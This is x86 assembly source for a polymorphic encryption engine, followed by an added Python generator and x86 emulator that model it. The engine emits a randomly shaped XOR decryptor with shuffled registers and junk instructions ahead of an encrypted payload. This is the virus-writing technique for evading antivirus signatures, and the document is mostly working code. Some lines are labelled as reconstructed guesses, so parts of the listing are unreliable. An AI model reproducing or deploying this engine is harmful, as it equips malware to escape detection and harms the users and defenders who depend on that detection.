.586p
.model flat, stdcall
Public _metramorphosize
.code
STARTOFEVOLUTIONENGINE = $
;***************************************************************************
;*  Polymorphic (deformation) engine principle:                            *
;*  The deformed code consists of two parts:                               *
;*  1) a decoding module that the engine generates at random; the          *
;*     standard decoding module looks like this:                           *
;*     ______________________________________                              *
;*    |  pushad                               |                            *
;*    |  call @0                              |                            *
;*    | @0:                                   |                            *
;*    |  pop  Index_reg                       |                            *
;*    |  add  Index_reg, offset EncryptedData |                            *
;*    |  mov  Count_reg, count                |                            *
;*    |  mov  Key_reg, Key                    |                            *
;*    | @1:                                   |                            *
;*    |  xor  [Index_reg], Key_reg            |                            *
;*    |  add  Index_reg, 4                    |                            *
;*    |  dec  Count_reg                       |                            *
;*    |  jnz  @1                              |                            *
;*    |  popad                                |                            *
;*    |_______________________________________|                            *
;*     Three registers are picked at random to serve as the index          *
;*     register, the key register and the counter register, and 1~3       *
;*     garbage instructions are inserted at random points of the module.   *
;*     In the generated code 'call @0' additionally jumps over 6~18 bytes  *
;*     of junk, and 'offset EncryptedData' is an 8-bit displacement        *
;*     patched in once the size of the module is known.                    *
;*  2) the encrypted code, which directly follows the decoding module.     *
;***************************************************************************

; x86 register numbers as used in opcode/modrm bytes
EAX_REG = 0
ECX_REG = 1
EDX_REG = 2
EBX_REG = 3
ESP_REG = 4
EBP_REG = 5
ESI_REG = 6
EDI_REG = 7
; 0 ---- EAX; 1 ---- ECX; 2 ---- EDX; 3 ---- EBX; 4 ---- ESP; 5 ---- EBP; 6 ---- ESI; 7 ---- EDI

; positions within Regtable after it has been shuffled
INDEX_REG = 0
KEY_REG   = 1
COUNT_REG = 2
FREE_REG1 = 3
FREE_REG2 = 4
FREE_REG3 = 5
FREE_REG4 = 6

;***********************************
;*                                 *
;*  return a random number between *
;*  0 ~ (x-1)                      *
;*                                 *
;***********************************
; Called as 'push x / call Random'. The result is returned in edx, eax is
; preserved and the argument is removed by 'ret 4'. RDTSC is the only entropy
; source, so the sequence is predictable; that is enough to vary the decoder
; but must not be mistaken for a cryptographic random number generator.
Random:
    push eax
    db   0Fh, 031h                   ; rdtsc (edx:eax = time-stamp counter)
    xor  edx, edx
    div  dword ptr [esp+8]           ; [esp] = saved eax, [esp+4] = return address, [esp+8] = x
    pop  eax
    ret  4

; Routine1: emit the opcode byte of 'mov reg32, imm32' (0B8h + reg) for the
; register stored at Regtable[ecx]; the caller stores the imm32 afterwards.
Routine1:
    mov  byte ptr [edi], 0B8h
    mov  dl, byte ptr [ebx+ecx]
    add  [edi], dl
    inc  edi
    ret

;*********************************
;*                               *
;*  generate garbage statements  *
;*                               *
;*********************************
; Emits 1~3 junk instructions on the free registers (Regtable entries 3..6):
;   dec reg32        (48h+reg,           1 byte)
;   mov reg32, imm32 (0B8h+reg,          5 bytes)
;   add reg32, imm8  (83h C0h+reg ib,    3 bytes)
; The immediates are whatever already sits in the output buffer. Preserves
; eax and advances edi. Some lines of this routine did not survive the page's
; extraction; those marked "(reconstructed)" are inferred from the surrounding
; code and the description above.
GenerateGarbabyCode:
    push eax
    push 3
    call Random                      ; (reconstructed) edx = 0..2
    lea  ecx, [edx+1]                ; (reconstructed) 1..3 instructions
lp_GenerateGarbabyCode:
    push 4
    call Random                      ; (reconstructed) edx = 0..3: which free register
    mov  eax, edx                    ; (reconstructed)
    push 3
    call Random                      ; (reconstructed) edx = 0..2: which instruction
    cmp  edx, 2
    jz   lb_$A001
    cmp  edx, 1
    jz   lb_$A002
    mov  byte ptr [edi], 48h         ; dec reg32
    push 1                           ; (reconstructed) length
    jmp  lb_$A003                    ; (reconstructed)
lb_$A001:
    mov  byte ptr [edi], 0B8h        ; mov reg32, imm32
    push 5                           ; (reconstructed) length
    jmp  lb_$A003                    ; (reconstructed)
lb_$A002:
    mov  word ptr [edi], 0C083h      ; add reg32, imm8
    inc  edi                         ; (reconstructed) the register goes into the modrm byte
    push 2                           ; (reconstructed) remaining length
lb_$A003:
    add  eax, FREE_REG1
    mov  dl, [ebx+eax]
    add  [edi], dl                   ; patch the register number into the opcode/modrm byte
    pop  eax
    add  edi, eax
    loop lp_GenerateGarbabyCode
    pop  eax
    ret

;***************************************************************************
;*                                                                         *
;*  parameters:                                                            *
;*    [param1]  size (number of dwords to decode)                          *
;*    [param2]  key                                                        *
;*                                                                         *
;***************************************************************************
Regtable = $
@A = $
    db 0, 1, 2, 3, 5, 6, 7           ; register numbers; ESP (4) is never used

; GeneratedDecodeModule: writes one randomly shaped decoding module at edi and
; leaves edi pointing just past it (where the encrypted data must follow).
GeneratedDecodeModule PROC
    call @0
@0:
    pop  ebx
    lea  ebx, [ebx + @A - @0]        ; ebx -> Regtable, position independent
;***************************************************************************
;*                                                                         *
;*  Randomly permute the elements of the register table; the first three   *
;*  are then used as the index register, the key register and the         *
;*  counter register.                                                      *
;*                                                                         *
;***************************************************************************
lb_RandomizeRegisterTableAgain:
    mov  ecx, 19796                  ; number of random swaps
lp_RandomizeRegTable:
    push 7
    call Random
    xchg edx, esi
    push 7
    call Random
    mov  al, [ebx+edx]
    xchg al, [ebx+esi]
    xchg al, [ebx+edx]               ; swap Regtable[edx] and Regtable[esi]
    loop lp_RandomizeRegTable
;***************************************************************************
;*  Don't use EBP as the index register: 'xor [ebp], reg2' is 3 bytes      *
;*  long (modrm 00 101 means disp32, so a disp8 form must be used), while  *
;*  'xor [reg1], reg2' with any other register is 2 bytes long.            *
;***************************************************************************
    cmp  byte ptr [ebx+INDEX_REG], EBP_REG
    jz   lb_RandomizeRegisterTableAgain
;   push edi
    lea  esi, [ebx + GenerateGarbabyCode - @A]
    mov  byte ptr [edi], 60h         ; pushad
    inc  edi
    call esi                         ; generate garbage code
    mov  byte ptr [edi], 0E8h        ; call @0 ...
    inc  edi
    push 13
    call Random
    add  edx, 6                      ; ... over 6..18 bytes of junk
    mov  [edi], edx
    add  edi, 4
    push edi                         ; (B) the address that 'pop Index_reg' recovers
    lea  edi, [edi+edx]              ; skip the junk; it is never executed, so it is left as is
    mov  byte ptr [edi], 58h         ; pop Index_reg
    mov  al, [ebx+INDEX_REG]
    add  [edi], al
    inc  edi
    call esi                         ; generate garbage code
    mov  word ptr [edi], 0C083h      ; add Index_reg, imm8
    inc  edi
    add  [edi], al
    inc  edi
    push edi                         ; (C) the imm8 slot, patched at the end
    inc  edi
    call esi                         ; generate garbage code
    push KEY_REG
    pop  ecx
    call Routine1                    ; mov Key_reg, imm32 ...
    mov  edx, [esp+10h]              ; ... key: [esp]=C, [esp+4]=B, [esp+8]=return address, [esp+0Ch]=size, [esp+10h]=key
    mov  [edi], edx
    add  edi, 4
    call esi                         ; generate garbage code
    push COUNT_REG
    pop  ecx
    call Routine1                    ; mov Count_reg, imm32 ...
    mov  edx, [esp+0Ch]              ; ... size in dwords
    mov  [edi], edx
    add  edi, 4
    call esi                         ; generate garbage code
    push edi                         ; (D) loop head @1
    mov  word ptr [edi], 0031h       ; xor [Index_reg], Key_reg: 31 /r, modrm = 00 key index
    movzx edx, byte ptr [ebx+KEY_REG]
    shl  edx, 3
    add  dl, [ebx+INDEX_REG]
    inc  edi
    add  [edi], dl
    inc  edi
    call esi                         ; generate garbage code
    mov  dword ptr [edi], 4804C083h  ; add Index_reg, 4 ; dec Count_reg
    inc  edi
    add  [edi], al                   ; al still holds the index register number
    inc  edi
    inc  edi
    mov  dl, [ebx+COUNT_REG]
    add  [edi], dl
    inc  edi
    mov  dword ptr [edi], 00610075h  ; jnz @1 ; popad
    lea  ecx, [edi+1]                ; rel8 slot of the jnz
    pop  eax                         ; (D)
    sub  eax, edi
    dec  eax
    dec  eax                         ; rel8 = @1 - (address following the jnz)
    mov  [ecx], al
    inc  edi
    inc  edi
    inc  edi                         ; edi -> end of the module = start of the encrypted data
    pop  eax                         ; (C)
    pop  edx                         ; (B)
    mov  ecx, edi
    sub  ecx, edx
    mov  [eax], cl                   ; imm8 = data start - B; at most 18+1+3+5+5+2+4+3 fixed bytes plus
                                     ; 5 garbage blocks of at most 15 bytes = 116, so it fits a signed imm8
    ret  8
GeneratedDecodeModule ENDP

SIZE_OF_ENGINE = $ - StartOfEvolutionEngine

_Metramorphosize PROC
;***************************************************************************
;*                                                                         *
;*  parameters:                                                            *
;*    esi: the start address of the code to be encrypted                   *
;*    ecx: the length of that code in dwords (the loop below and the       *
;*         generated counter register both work 4 bytes at a time)         *
;*    edi: the start address of the buffer that receives the decoding      *
;*         module followed by the encrypted code                           *
;*  returns:                                                               *
;*    eax: the size of the generated decoding module in bytes              *
;*                                                                         *
;***************************************************************************
    db   0Fh, 031h                   ; rdtsc: the low dword in eax becomes the key
    push esi
    push eax
    push ecx
    push edi
    push eax                         ; [param2] key
    push ecx                         ; [param1] size in dwords
    call GeneratedDecodeModule       ; edi -> just past the decoding module
    pop  edx                         ; original edi (buffer start)
    pop  ecx
    pop  eax
    pop  esi
    sub  edx, edi                    ; buffer start - end of module = -(module size)
    neg  edx                         ; (reconstructed) the extracted text shows 'sub edx, edi' alone,
                                     ; which would return the negated size
    push edx
lp_EncryptData:
    mov  edx, [esi]
    xor  edx, eax
    mov  [edi], edx
    add  esi, 4
    add  edi, 4
    loop lp_EncryptData
    pop  eax
    ret
_Metramorphosize ENDP
END
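To see a generated decoding module actually run without assembling and executing 32-bit code, here is an added example that is not part of the original engine: a Python model that builds a decoder with the same register shuffle, garbage insertion and byte layout as GeneratedDecodeModule, encrypts a payload the way _Metramorphosize does, and then runs the result through a tiny x86-32 emulator covering exactly the instruction subset the engine emits (pushad, call, pop, mov/add/dec on a register, xor [reg],reg, jnz, popad). The emulator, the generate/emulate/roundtrip names and the sample payload are constructed here; the opcode bytes, offsets and register table come from the listing above.

```python
# Added example modelling the engine above (not the page's code); opcode bytes and layout follow the listing.
import random
import struct

EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI = range(8)
REG_TABLE = [EAX, ECX, EDX, EBX, EBP, ESI, EDI]     # regtable: db 0,1,2,3,5,6,7 (ESP excluded)
MASK = 0xFFFFFFFF

def _garbage(free, rng):                            # 1..3 junk instructions, as GenerateGarbabyCode
    out = b""
    for _ in range(rng.randrange(3) + 1):
        r, kind = free[rng.randrange(4)], rng.randrange(3)
        if kind == 2:
            out += bytes([0xB8 + r]) + rng.getrandbits(32).to_bytes(4, "little")  # mov r32, imm32
        elif kind == 1:
            out += bytes([0x83, 0xC0 + r, rng.getrandbits(8)])                    # add r32, imm8
        else:
            out += bytes([0x48 + r])                                              # dec r32
    return out

def _build_decoder(ndwords, key, rng):
    """One random decoder: (bytes, offset of the imm8 to patch, offset that 'pop idx' recovers)."""
    while True:                                      # LB_RandomizeRegisterTableAgain
        regs = rng.sample(REG_TABLE, len(REG_TABLE))
        idx, keyr, cnt, free = regs[0], regs[1], regs[2], regs[3:]
        if idx != EBP:                               # 'xor [ebp], r' would need a disp8 byte
            break
    skip = rng.randrange(13) + 6                     # push 13 / call Random / add edx, 6
    d = bytearray(b"\x60") + _garbage(free, rng)     # pushad
    d += b"\xE8" + struct.pack("<I", skip)           # call over 'skip' never-executed bytes
    ret_off = len(d)
    d += bytes(rng.getrandbits(8) for _ in range(skip))   # the engine leaves stale buffer bytes here
    d += bytes([0x58 + idx]) + _garbage(free, rng)        # pop idx
    fix_off = len(d) + 2
    d += bytes([0x83, 0xC0 + idx, 0x00]) + _garbage(free, rng)                   # add idx, imm8
    d += bytes([0xB8 + keyr]) + struct.pack("<I", key) + _garbage(free, rng)     # mov key, imm32
    d += bytes([0xB8 + cnt]) + struct.pack("<I", ndwords) + _garbage(free, rng)  # mov cnt, imm32
    loop = len(d)
    d += bytes([0x31, (keyr << 3) | idx]) + _garbage(free, rng)                  # xor [idx], key
    d += bytes([0x83, 0xC0 + idx, 4, 0x48 + cnt])                                # add idx, 4 ; dec cnt
    d += bytes([0x75, (loop - len(d) - 2) & 0xFF, 0x61])                         # jnz loop ; popad
    return d, fix_off, ret_off

def generate(payload, key, rng):
    """Decoder followed by the XOR-encrypted payload, laid out as _Metramorphosize does."""
    n = len(payload) // 4
    assert n and len(payload) % 4 == 0, "the engine encrypts whole dwords"
    d, fix_off, ret_off = _build_decoder(n, key, rng)
    assert len(d) - ret_off < 0x80      # 83 /0 ib sign-extends; by construction at most 116 bytes
    d[fix_off] = len(d) - ret_off
    fmt = "<%dI" % n
    return bytes(d) + struct.pack(fmt, *(w ^ key for w in struct.unpack(fmt, payload)))

def emulate(image, base=0x10000, max_steps=100000):
    """Run the decoder in place and return the memory image once its 'popad' executes."""
    mem = bytearray(0x20000)
    mem[base:base + len(image)] = image
    r, eip, zf = [0, 0, 0, 0, 0x1FF00, 0, 0, 0], base, False   # registers (ESP = stack top), EIP, ZF
    def push(v):
        r[ESP] -= 4
        struct.pack_into("<I", mem, r[ESP], v & MASK)
    for _ in range(max_steps):
        op, m = mem[eip], mem[eip + 1]
        if op == 0x60:                                           # pushad
            for v in list(r):
                push(v)
            eip += 1
        elif op == 0x61:                                         # popad: the decoder is done
            return bytes(mem[base:base + len(image)])            # (registers are not needed after it)
        elif op == 0xE8:                                         # call rel32
            push(eip + 5)
            eip += 5 + struct.unpack_from("<i", mem, eip + 1)[0]
        elif 0x58 <= op <= 0x5F:                                 # pop r32
            r[op - 0x58] = struct.unpack_from("<I", mem, r[ESP])[0]
            r[ESP], eip = r[ESP] + 4, eip + 1
        elif 0xB8 <= op <= 0xBF:                                 # mov r32, imm32
            r[op - 0xB8], eip = struct.unpack_from("<I", mem, eip + 1)[0], eip + 5
        elif 0x48 <= op <= 0x4F:                                 # dec r32
            r[op - 0x48] = (r[op - 0x48] - 1) & MASK
            zf, eip = r[op - 0x48] == 0, eip + 1
        elif op == 0x83 and m >= 0xC0 and ((m >> 3) & 7) == 0:   # add r32, imm8 (sign-extended)
            r[m & 7] = (r[m & 7] + struct.unpack_from("<b", mem, eip + 2)[0]) & MASK
            zf, eip = r[m & 7] == 0, eip + 3
        elif op == 0x31 and m < 0x40 and (m & 7) not in (ESP, EBP):  # xor [r32], r32
            v = struct.unpack_from("<I", mem, r[m & 7])[0] ^ r[(m >> 3) & 7]
            struct.pack_into("<I", mem, r[m & 7], v)
            zf, eip = v == 0, eip + 2
        elif op == 0x75:                                         # jnz rel8
            eip += 2 + (struct.unpack_from("<b", mem, eip + 1)[0] if not zf else 0)
        else:
            raise ValueError("unsupported opcode %#x at %#x" % (op, eip))
    raise RuntimeError("decoder did not terminate")

def roundtrip(payload, key, seed):                  # encrypt, emulate, return (blob, recovered payload)
    blob = generate(payload, key, random.Random(seed))
    return blob, emulate(blob)[-len(payload):]
```

Calling roundtrip(b"Hello, metamorphic!\x00", 0xDEADBEEF, seed) for different seeds yields decoders of different length, register choice and junk, yet the emulator recovers the same plaintext each time; the emulator deliberately refuses 'xor [ebp], reg' and any opcode outside the emitted subset, so a layout bug in the generator shows up as an exception rather than a silent wrong result.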